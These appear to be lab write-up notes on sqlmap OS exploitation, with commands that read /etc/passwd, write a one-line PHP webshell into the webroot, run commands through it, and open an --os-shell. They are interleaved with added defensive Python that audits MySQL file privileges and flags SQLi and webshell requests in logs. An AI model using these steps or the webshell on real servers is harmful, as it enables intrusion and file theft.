OS EXPLOITATION

SQLMap can use a SQL injection to read and write files on the DBMS host's filesystem, outside the DBMS itself. It can also attempt direct command execution on the remote host when the database user has sufficient privileges.

To read local files, the DB user must hold the LOAD DATA and INSERT privileges in order to load the content of a file into a table and then read that table back.

An example of such a command is LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE passwd;

Requirements:

  • DBA: True

  • File Read/Write

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
BURP > Proxy > Intercept > Raw > right-click > copy to file > burpRequest.txt
 * this method is used when intercepting potential parameters with Burp Suite along
   with exporting the complex HTTP request with lots of different header values Burp has captured

 * inspect the request and obtain any pertinent info
    - GET /?id=1 HTTP/1.1

root@oco:~$ sqlmap -r req.txt --banner --current-user --current-db --is-dba --dump --batch --level=5 --risk=3 --no-cast --threads=10 --random-agent
 * current user is DBA: True
 
#Reading Local Files
root@oco:~$ sqlmap -r req.txt --file-read "/etc/passwd"
 * sqlmap has no option to test beforehand whether a file location can be read or written
    - secure_file_priv is a MySQL-specific server setting; it limits (or, when NULL, disables) server-side file import/export
 * the --file-read option is used to read files from the local system
    - file save location ~/.sqlmap/output/{targetSite}/files/_etc_passwd (newer sqlmap versions use ~/.local/share/sqlmap/output/)
root@oco:~$ cat ~/share/sqlmap/output/{targetSite}/files/_etc_passwd
    
#Writing Files to the Host Server
#modern DBMSes disable file writing by default and require specific privileges before DBAs can write files
#the secure_file_priv setting must be manually disabled (set empty) to allow writing data into local files with the INTO OUTFILE SQL query
root@oco:~$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
root@oco:~$ sqlmap -r req.txt --file-write "shell.php" --file-dest "/var/www/html/shell.php"
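Defender-side check for the two conditions the file read and file write steps above depend on (the FILE privilege of the injected account and the secure_file_priv setting). This is an added example, not part of the original notes or of sqlmap; it parses the text output of SHOW VARIABLES and SHOW GRANTS, and every sample value below is constructed.

```python
"""Added example: audit a MySQL account's ability to read/write server files via SQL.

Input is the text output of two queries a DBA already runs, captured for instance with
`mysql -e`. All sample output below is constructed for the example, not a real capture.
"""
import re

# Constructed output of: SHOW VARIABLES LIKE 'secure_file_priv'
WEAK_VARIABLES = "Variable_name\tValue\nsecure_file_priv\t\n"          # empty: any path
HARDENED_VARIABLES = "Variable_name\tValue\nsecure_file_priv\tNULL\n"  # NULL: disabled
RESTRICTED_VARIABLES = "Variable_name\tValue\nsecure_file_priv\t/var/lib/mysql-files/\n"

# Constructed output of: SHOW GRANTS FOR 'webapp'@'localhost'
WEAK_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO `webapp`@`localhost`"]
HARDENED_GRANTS = ["GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO `webapp`@`localhost`"]


def parse_secure_file_priv(show_variables_output):
    """Return None for NULL (file I/O disabled), '' for unrestricted, else the allowed directory."""
    for line in show_variables_output.splitlines():
        name, _, value = line.partition("\t")
        if name == "secure_file_priv":
            return None if value == "NULL" else value
    raise ValueError("secure_file_priv not present in SHOW VARIABLES output")


def grants_file_capability(grant_lines):
    """True if any GRANT line confers the global FILE privilege, explicitly or via ALL on *.*."""
    for grant in grant_lines:
        head, _, rest = grant.upper().partition(" ON ")
        head = re.sub(r"^GRANT\s+", "", head)
        privs = {p.strip() for p in head.split(",")}
        if "FILE" in privs:
            return True
        if privs & {"ALL", "ALL PRIVILEGES"} and rest.startswith("*.*"):
            return True
    return False


def assess(show_variables_output, grant_lines):
    """Rate the risk that LOAD DATA INFILE / LOAD_FILE() / SELECT ... INTO OUTFILE work for this account."""
    sfp = parse_secure_file_priv(show_variables_output)
    if not grants_file_capability(grant_lines):
        return "ok: account lacks FILE; server-side file read/write statements are refused"
    if sfp is None:
        return "ok: FILE granted but secure_file_priv=NULL disables all file import/export"
    if sfp == "":
        return "HIGH: FILE granted and secure_file_priv is empty; any path the mysqld user can reach is readable and writable"
    return f"MEDIUM: FILE granted; file access confined to {sfp}; confirm the webroot lies outside it"


if __name__ == "__main__":
    for label, variables, grants in [
        ("weak", WEAK_VARIABLES, WEAK_GRANTS),
        ("hardened server", HARDENED_VARIABLES, WEAK_GRANTS),
        ("least-privilege account", WEAK_VARIABLES, HARDENED_GRANTS),
        ("restricted dir", RESTRICTED_VARIABLES, WEAK_GRANTS),
    ]:
        print(f"{label}: {assess(variables, grants)}")
```

Either control on its own closes the path used above: a web application account without FILE cannot run the file statements regardless of secure_file_priv, and secure_file_priv=NULL refuses them even for an account with ALL PRIVILEGES.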

#ALT METHOD: RCE verification
root@oco:~$ curl http://{targetSite:port}/shell.php?cmd=ls+-la
 * the + in ls+-la is the URL encoding of a space
root@oco:~$ curl http://{targetSite:port}/shell.php?cmd=cat+flag.txt
 * HTB{5up3r_u53r5_4r3_p0w3rful!}

#once File writing is confirmed, use the cmd below to test SQLMap's remote shell ability
#instead of manually writing a remote shell
root@oco:~$ sqlmap -r req.txt --os-shell --batch
 * this default method uses the UNION-based technique
os-shell> ls -la
 do you want to retrieve the command standard output? [Y/n/a] a
 * if the above fails, use the alternate technique
 
root@oco:~$ sqlmap -r req.txt --os-shell --technique=E --batch
 * this alternate method uses Error-based SQL Injection technique
    - --technique=E means Error-based SQLi
 which web application language does the web server support?
 [1] ASP
 [2] ASPX
 [3] JSP
 [4] PHP (default)
 > 4
 
 do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
 
 what do you want to use for writable directory?
 [1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (default)
 [2] custom location(s)
 [3] custom directory list file
 [4] brute force search
 > 1
 
os-shell> ls -la
 do you want to retrieve the command standard output? [Y/n/a] a
 command standard output:
 ---
 total 156
 drwxrwxrwt 1 www-data www-data   4096 Nov 19 18:06 .
 drwxr-xr-x 1 www-data www-data   4096 Nov 19 08:15 ..
 -rw-rw-rw- 1 mysql    mysql       188 Nov 19 07:39 basic.php
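What the steps above leave in a web server's access log, from the defender's side: this added example (not part of the original notes or of sqlmap) runs a small detector over constructed Apache-style log lines and flags sqlmap's default User-Agent (which --random-agent, used above, hides, so it is never sufficient on its own), SQL meta-characters in URL parameters, and command-style parameters such as cmd= on PHP files. Every IP, timestamp and line is constructed for the example.

```python
"""Added example: flag SQLi probing and webshell-style requests in access log lines."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines (not a real capture).
SAMPLE_LOG = """
10.0.0.5 - - [19/Nov/2023:18:01:02 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.11#stable (https://sqlmap.org)"
10.0.0.5 - - [19/Nov/2023:18:01:03 +0000] "GET /?id=1%27%20AND%201%3D1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [19/Nov/2023:18:06:10 +0000] "GET /shell.php?cmd=ls+-la HTTP/1.1" 200 233 "-" "curl/7.88.1"
10.0.0.5 - - [19/Nov/2023:18:06:15 +0000] "GET /shell.php?cmd=cat+flag.txt HTTP/1.1" 200 40 "-" "curl/7.88.1"
192.168.1.20 - - [19/Nov/2023:18:07:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Tokens that rarely appear in legitimate parameter values but are typical of injection probes.
SQLI_RE = re.compile(
    r"(?i)('|\"|--|/\*|\bunion\b|\bselect\b|\bsleep\(|\bbenchmark\(|\band\s+\d+=\d+|\bor\s+\d+=\d+)"
)

# Parameter names commonly used by one-line PHP webshells to receive a command (assumed list).
CMD_PARAMS = {"cmd", "command", "exec"}


def parse_line(line):
    """Split one combined-format line into fields; decode the query string (%xx and + to space)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the list of reasons this request looks suspicious (empty when clean)."""
    reasons = []
    if "sqlmap" in rec["ua"].lower():
        reasons.append("sqlmap default user-agent")
    for name, value in rec["params"]:
        if SQLI_RE.search(value):
            reasons.append(f"sql meta-characters in parameter '{name}'")
        if name.lower() in CMD_PARAMS and rec["path"].endswith(".php"):
            reasons.append(f"command-style parameter '{name}'={value!r} on PHP file")
    return reasons


def scan(log_text):
    """Return [(ip, path, reasons)] for every line that triggers at least one rule."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            hits.append((rec["ip"], rec["path"], reasons))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in scan(SAMPLE_LOG):
        print(f"{ip} {path}: {'; '.join(reasons)}")
```

The strongest single signal here is the last rule: a request to a PHP file that did not exist before, carrying a command in a parameter, is exactly the trace --file-write and --os-shell leave, and it survives --random-agent. Pair it with file-integrity monitoring of the web root (the writable directory list sqlmap prompts for above is a good starting set of paths to watch).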
